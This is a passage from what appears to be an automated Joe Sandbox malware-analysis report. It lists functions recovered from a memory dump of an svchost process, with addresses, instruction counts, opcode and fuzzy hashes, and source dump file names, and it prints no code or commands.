                                          • API String ID:
                                          • Opcode ID: 07cb19812ebbe2b2e13da82ce4d37d0e4295b2d98a605b44fb5b28735d4e7eb2
                                          • Instruction ID: f61c50e9d697c1e3c6127acd22ccac3da4e4ebdfc18770bfb6bc2c61de0f9681
                                          • Opcode Fuzzy Hash: 07cb19812ebbe2b2e13da82ce4d37d0e4295b2d98a605b44fb5b28735d4e7eb2
                                          • Instruction Fuzzy Hash: 2021B373504B449BC711DF6DCA44BA7B7ECEF81680F0C0A5BB9509B261D734D508CAA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AF070D Relevance: .1, Instructions: 72COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                          • Instruction ID: 7164c6de8925f61014c04702201a9f79ba1162464c97f170ed68ed65542d3008
                                          • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                          • Instruction Fuzzy Hash: A421043A2047009FD715DF58C880B6ABBA5EFC5350F08866EFA958F392D730D909CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AA7794 Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 51482a44ae7b7cf4491d3abfbbbc6fdde073057f4e6c722d8f6a88ea203adb5c
                                          • Instruction ID: 8c47346cb5e58f2b427c86b54057040281bb950d4ad085d12c8b655559093087
                                          • Opcode Fuzzy Hash: 51482a44ae7b7cf4491d3abfbbbc6fdde073057f4e6c722d8f6a88ea203adb5c
                                          • Instruction Fuzzy Hash: 1621CD72900A04ABC725DFA9D980E6BB7A8EF88340F14056EE50ACB750DB35E900CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A4AE73 Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                          • Instruction ID: dbfcaf58c483068775d22cfd893103c67cb213369fd6e34b74d04f659f0bce31
                                          • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                          • Instruction Fuzzy Hash: 3521F632A01694AFEB15DB68C944B2577E8EF85340F0D08E7DE049B792E739DC40C690
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A5FD9B Relevance: .1, Instructions: 69COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                          • Instruction ID: 96b942a7b22887a1a7ce844243f9d4055c4254fc11fe47a6a2aa95d5a1fca4ca
                                          • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                          • Instruction Fuzzy Hash: A3216872640A40DFDB31CF0AC640A66F7F9EB94A10F29856FFD498BA15D735AC00CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A5B390 Relevance: .1, Instructions: 63COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 74539bf4535406d1debec08818890d8fe566a5c4838c4b8e74ef52ab2880a503
                                          • Instruction ID: 39808f32a84b9dc19d9a5eb3bde044a14aa935f21a925353ba2b01c8861beeac
                                          • Opcode Fuzzy Hash: 74539bf4535406d1debec08818890d8fe566a5c4838c4b8e74ef52ab2880a503
                                          • Instruction Fuzzy Hash: 20116F373151149FCB18CB148E4162B72AAEBD5370B29017FED16DB780C9319C01C690
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A29240 Relevance: .1, Instructions: 63COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 789e905422faac0ae6d47f401c84c90d56a6c4b5c985faa8a655d63a2b2293b6
                                          • Instruction ID: 8ca769b6d281f7f0e19aaabaaade96d26e01b7eba9b7b06638420997aaebbfe6
                                          • Opcode Fuzzy Hash: 789e905422faac0ae6d47f401c84c90d56a6c4b5c985faa8a655d63a2b2293b6
                                          • Instruction Fuzzy Hash: 0D215936140740DFC721EF68CB40F1ABBB9BF08704F44456EE11A8BAA2CB35E951DB44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AB4257 Relevance: .1, Instructions: 60COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 48bbd48db6533e509d677b228e92ce9a2faedd99c688d651595f9986776f7285
                                          • Instruction ID: 3a0ba649cf3320abe8338a9c4b85e2e42e2959cc77b0beba5ff9170f8a6a979c
                                          • Opcode Fuzzy Hash: 48bbd48db6533e509d677b228e92ce9a2faedd99c688d651595f9986776f7285
                                          • Instruction Fuzzy Hash: FC218B75900B10CFC719EF26D240A94BBB8FB89318B9882AFC195CB797D731C452CB41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A52397 Relevance: .1, Instructions: 59COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ba8c0b489539c099e36cb9362602c568bafb1e7cc450b670500582f84de1cbb8
                                          • Instruction ID: 9dcf7972aadb8c0136188f9b5dc567af1f479225588c554d1848ed91186a6842
                                          • Opcode Fuzzy Hash: ba8c0b489539c099e36cb9362602c568bafb1e7cc450b670500582f84de1cbb8
                                          • Instruction Fuzzy Hash: 0C11DB31704304AFE721EB29AE84B19B7D9FBE0764F58486BF902EB691CB74D8418754
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AA46A7 Relevance: .1, Instructions: 59COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                          • Instruction ID: 60f3e51ee7601c0e65c93a55af1246832a72a1b35234b06311c68ebd58ba7753
                                          • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                          • Instruction Fuzzy Hash: 93110276504208BBC705DF5D99808BEB7B9EF99300F1080AAF9448B350DA318D51C3A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A2C962 Relevance: .1, Instructions: 57COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4fe28fb8c2a316969ab7f65ea4c0c7a73401aed12b0003ad06f9179fad9ecdee
                                          • Instruction ID: f262d97e04eb5f869179f3f334af85ca795ee886ea753bbb55ff755308c3d80b
                                          • Opcode Fuzzy Hash: 4fe28fb8c2a316969ab7f65ea4c0c7a73401aed12b0003ad06f9179fad9ecdee
                                          • Instruction Fuzzy Hash: 4611AC323107169BDB10EF28DE89A2AB7E5BB88618B44057BE841A7650DF21ED10C7E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A637F5 Relevance: .1, Instructions: 57COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8ed00fab27f0b4811f99579d43855d8a01ec839dd35ad1ac05194498ed0460cd
                                          • Instruction ID: fe71bc4b84a0cf81c6be9be173ff38923d5759ec278133eb9c95723e00972d73
                                          • Opcode Fuzzy Hash: 8ed00fab27f0b4811f99579d43855d8a01ec839dd35ad1ac05194498ed0460cd
                                          • Instruction Fuzzy Hash: A401DF799016105BC737CB1A9A40E6ABBB9DFC6750B1950AFE5458B365D730C802C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A5002D Relevance: .1, Instructions: 55COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                          • Instruction ID: 25b2bb1d58f204479076db83653b0888cc5a0d6772f27dafe63dff3586a27ae5
                                          • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                          • Instruction Fuzzy Hash: E011E1362056C08FEB22DB29CA44B3577E8AB44754F0D00E7ED14AB792D739C842C660
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A3766D Relevance: .1, Instructions: 54COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                          • Instruction ID: e151efa8729dbe72efeea9b6c2ba7d57330fa7a6944984db79d0b7357589d841
                                          • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                          • Instruction Fuzzy Hash: 0B01D4B2740218AFC720DF5ECD60E5BB7ADEB857A0B280526B908CF240DB35DC0183A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A29080 Relevance: .1, Instructions: 53COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e6e2632f34cc8c3eb6ae8ace111aa2ab68a4247e010e253a511eeef5ee3c54e9
                                          • Instruction ID: dbbecdcac81eff0928d2cb7131837522a20eb4dd9d29da61d192a8619969f72b
                                          • Opcode Fuzzy Hash: e6e2632f34cc8c3eb6ae8ace111aa2ab68a4247e010e253a511eeef5ee3c54e9
                                          • Instruction Fuzzy Hash: 5A0181725056188FD329DF18E940B12BBA9EB86B24F2541BBE505CB791C374DD51CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03ABC450 Relevance: .1, Instructions: 53COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                          • Instruction ID: 1944399cbfac4bff0bf9595110ef9f64aa1308d260398e7c00e0cc50e8b772dd
                                          • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                          • Instruction Fuzzy Hash: 10018076140605BFD721EF65CE94EA3F77DFB543A0F04452BF21446661CB32ACA1CAA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AF4015 Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1684ac32d73f75facb10213ab6b0fc1125ded11f591214bffb8dcf235c004372
                                          • Instruction ID: f7c490e49f7b157185244867bc0987d3ddf16ccdf579229d2bd644239e7ad762
                                          • Opcode Fuzzy Hash: 1684ac32d73f75facb10213ab6b0fc1125ded11f591214bffb8dcf235c004372
                                          • Instruction Fuzzy Hash: 1F0184766016497FC211EB69CE80E17B7ACFB89750B00062AF608CBB21CB24EC11C6E4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AE138A Relevance: .0, Instructions: 48COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 846b7fc6741abc113442b5e386285ed25221b12917f429efa4c82d980d605958
                                          • Instruction ID: 5e2a039d93b1aed925d188215a90e3d8639151f0be628c9bc7b2591731720b73
                                          • Opcode Fuzzy Hash: 846b7fc6741abc113442b5e386285ed25221b12917f429efa4c82d980d605958
                                          • Instruction Fuzzy Hash: 9C015275A00358AFCB14DFA9D941EAEB7B8EF44710F40405BB914EB380DA749A01CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AE14FB Relevance: .0, Instructions: 48COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 40548712d9dd77a49cc058bda1191313d14d8cb5eb109ad25e3432b1a466f978
                                          • Instruction ID: 1a920fb1963ab23582d3ba615168ebba283cbfd0b99fb534e4f6fe3b0f10f63d
                                          • Opcode Fuzzy Hash: 40548712d9dd77a49cc058bda1191313d14d8cb5eb109ad25e3432b1a466f978
                                          • Instruction Fuzzy Hash: F9019E75A00358AFCB00EFA9D941EAEBBB8EF44700F40406BF914EB380DA75DA00CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A258EC Relevance: .0, Instructions: 47COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: faf53612682554596f9089b1a97eb854c4b0d08101399a0a5da532328b4deecb
                                          • Instruction ID: 6dc96b07bd6d06f9aec28607053fa963de2182ef74a982829fd4d1baa14029e9
                                          • Opcode Fuzzy Hash: faf53612682554596f9089b1a97eb854c4b0d08101399a0a5da532328b4deecb
                                          • Instruction Fuzzy Hash: 8F014876E006189BC714EB6EDD049AFF7B9FB85120B95406F98069B744DF31DE05C650
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A3B02A Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                          • Instruction ID: 9bf863ecfc641dbecaffbc0bc71aea1fed1691a14ed5fc00c59a93dfb4dfd88c
                                          • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                          • Instruction Fuzzy Hash: 5E018F32208A809FD322DB5DC988FA6B7EDEB86750F0D00B7F919CBA51D729DC40C620
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AF1074 Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b134db5229fff2e1d293f7066b9192f1e9159d1626e1e5c73fea9e022ba9aceb
                                          • Instruction ID: 7f2da58fa81fed8e419c08fb5a90835502bb181306841ce258e4a54966ddaada
                                          • Opcode Fuzzy Hash: b134db5229fff2e1d293f7066b9192f1e9159d1626e1e5c73fea9e022ba9aceb
                                          • Instruction Fuzzy Hash: AF012476504781DFC710EFA9CA40B1BB7E5AB84214F088A2AF98687790EE35D840CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03ADFEC0 Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7de130efa67423980a0242c3d2921c0acb114cef4aece91b79420dd0159ca3bb
                                          • Instruction ID: d9bb6848b4e0b9e099a5c6d6002ea7e6ec5fef40327501e37fb21665bc7e8ab6
                                          • Opcode Fuzzy Hash: 7de130efa67423980a0242c3d2921c0acb114cef4aece91b79420dd0159ca3bb
                                          • Instruction Fuzzy Hash: D8017175A00218AFCB14DBA9D945AAFB7B8EB44700F40406AB901AB380EA749A01C794
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03ADFE3F Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9eeba92c67261166ad862717debf79ff197663624c3b6c34b268df55f8f82db3
                                          • Instruction ID: 8a7a87e4a7bdc3ef2ef77f14fac6caaa563f35ab78aefa181bcb773d4d0ddd08
                                          • Opcode Fuzzy Hash: 9eeba92c67261166ad862717debf79ff197663624c3b6c34b268df55f8f82db3
                                          • Instruction Fuzzy Hash: 2A017175A00358AFCB14DFA9D945EAFB7B8EF44700F00406AB901AB381DA749A01C7A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AF8A62 Relevance: .0, Instructions: 44COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 00733c36a0f7df0dc22d32fac70d6b86234672652a5cdb31bab73e8a4dbb58f4
                                          • Instruction ID: 855b629e6ec46e5dcc11c80ed6beee7d441b5c94d8de6f1f7c7da7c679b832de
                                          • Opcode Fuzzy Hash: 00733c36a0f7df0dc22d32fac70d6b86234672652a5cdb31bab73e8a4dbb58f4
                                          • Instruction Fuzzy Hash: DE011E75A002189FCB00DFA9D9419AEB7B8EF48310F50415AF904EB341D634AA018BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AF8ED6 Relevance: .0, Instructions: 44COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1542e09b88e728a7006bcf58fc82cdd7fc504a013ad501b8adc7cbec77b37309
                                          • Instruction ID: 8959853d7a24284efbf9cd552f9adeae70dd48627c9f1e753e25bb5245b5cbd6
                                          • Opcode Fuzzy Hash: 1542e09b88e728a7006bcf58fc82cdd7fc504a013ad501b8adc7cbec77b37309
                                          • Instruction Fuzzy Hash: 6711DE74A102599FDB04DFA9D541BAEF7F4FF08700F1482AAE519EB781E6349A41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A2DB60 Relevance: .0, Instructions: 43COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                          • Instruction ID: c5c32509cd687e0f3786b9d19eacdc019a85495ae1c94c54047aa01216880d55
                                          • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                          • Instruction Fuzzy Hash: D0F0FC372056329BD332EB5D89A0F67FEA59FC2A60F19043BF5159F345CA608C0287D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A2B1E1 Relevance: .0, Instructions: 42COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                          • Instruction ID: c0c5ebe28655526f202d7808960754344398f43a42e78c9cb7f027c1091a1a54
                                          • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                          • Instruction Fuzzy Hash: 9401AD322006909BD326E75EC904BAABBA8EF95750F0D04A7E9148F6A1E679C8008764
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03ABFE87 Relevance: .0, Instructions: 38COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 321f9e1b63d55a6f17178d4e0399925226df2deaa219dddb437237b07ee93bd3
                                          • Instruction ID: 265fe42bd1a12001f0a4032d3714da203b46e0b95c969033d4388c7afa98ff18
                                          • Opcode Fuzzy Hash: 321f9e1b63d55a6f17178d4e0399925226df2deaa219dddb437237b07ee93bd3
                                          • Instruction Fuzzy Hash: 6E016274A00308AFCB14DFA8D941AAEB7F4EF04704F14415AA514DF382DA35DA01CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AE131B Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d253032762063b541a3e58095cb2f83e907a9e1509a8ae0e8b0e2e11f615f14d
                                          • Instruction ID: 94584b2f957247120d0e5518dd50d9b1b86ec683c57863b13b5224060bc3a965
                                          • Opcode Fuzzy Hash: d253032762063b541a3e58095cb2f83e907a9e1509a8ae0e8b0e2e11f615f14d
                                          • Instruction Fuzzy Hash: F6013C75A01258AFCB44EFA9D645AAEB7F4FF48700F50805AB815EB381EA349A00CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AF8F6A Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9cbfe94cda6dd4c19f3664ccbdea812349c26a894a4c75a9afce2eebf6a1570a
                                          • Instruction ID: 74301e0af5d328afdd2f84b19eeea4850851bf6bad5ec5c33cb518a90c7a4ae9
                                          • Opcode Fuzzy Hash: 9cbfe94cda6dd4c19f3664ccbdea812349c26a894a4c75a9afce2eebf6a1570a
                                          • Instruction Fuzzy Hash: 96014474A0020DAFCB00EFA8D645AAEB7F4EF58300F50445AB905EB381EB34DA00CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AE1608 Relevance: .0, Instructions: 34COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6e0e83928ec46cf1b7fd556ce85b6edf2acf0adf23dba61fc74e1925ec095cfe
                                          • Instruction ID: 1988ad7444ea9ec5b55ee6e7812e714fa6445a6329f77aace212c04b875148ec
                                          • Opcode Fuzzy Hash: 6e0e83928ec46cf1b7fd556ce85b6edf2acf0adf23dba61fc74e1925ec095cfe
